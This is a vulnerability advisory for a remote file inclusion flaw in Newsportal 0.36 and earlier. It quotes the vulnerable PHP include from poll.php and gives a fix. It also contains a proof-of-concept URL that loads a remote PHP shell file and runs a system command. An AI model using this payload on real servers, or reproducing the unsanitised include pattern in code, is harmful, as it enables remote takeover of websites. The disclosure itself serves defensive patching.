Newsportal <= 0.36 Remote File Inclusion Vulnerability

2006.05.25
Risk: Low
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 6.4/10
Impact Subscore: 4.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: None

Newsportal <= 0.36 Remote File Inclusion Vulnerability [+] Affected Software: Newsportal <= 0.36 + register_globals=on [+] Vendor: http://florian-amrhein.de/newsportal [+] Contact. philipp.niedziela<img src="/imgs/at.gif" border=0 align=middle>gmx.de [+] Vuln discovered by: Florian Amrhein [+] PoC by: Philipp Niedziela // CODE [newsportal]/extras/poll/poll.php -------------------------------------------- <? // experimental! // fills article-cache $url=explode("/",$PATH_INFO); $group=$url[1]; include "config.inc"; $title.= ' - '.$group; include "head.inc"; ?> <a name="top"></a> <h1 align="center"><?php echo $group; ?></h1> <p>Lese Overview- und Artikeldaten ein...</p> <? // -----> VULN include("$file_newsportal"); // <----- VULN $ns=OpenNNTPconnection($server,$port); flush(); if ($ns != false) { $headers = readOverview($ns,$group,1,true); closeNNTPconnection($ns); } ?> <p align="right"><a href="#top"><? echo $text_thread["button_top"];?></a></p> <? include "tail.inc"; ?> // CODE -------------------------------------------- [+] PoC: http://[url]/[pathtonewsportal]/extras/poll/poll.php?file_newsportal=http://localhost/phpshell.txt?cmd=uname -a [+] Solution: Upgrade to 0.37 || del. [newsportal]/extras/poll/poll.php [+] Greets: Lenni :)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top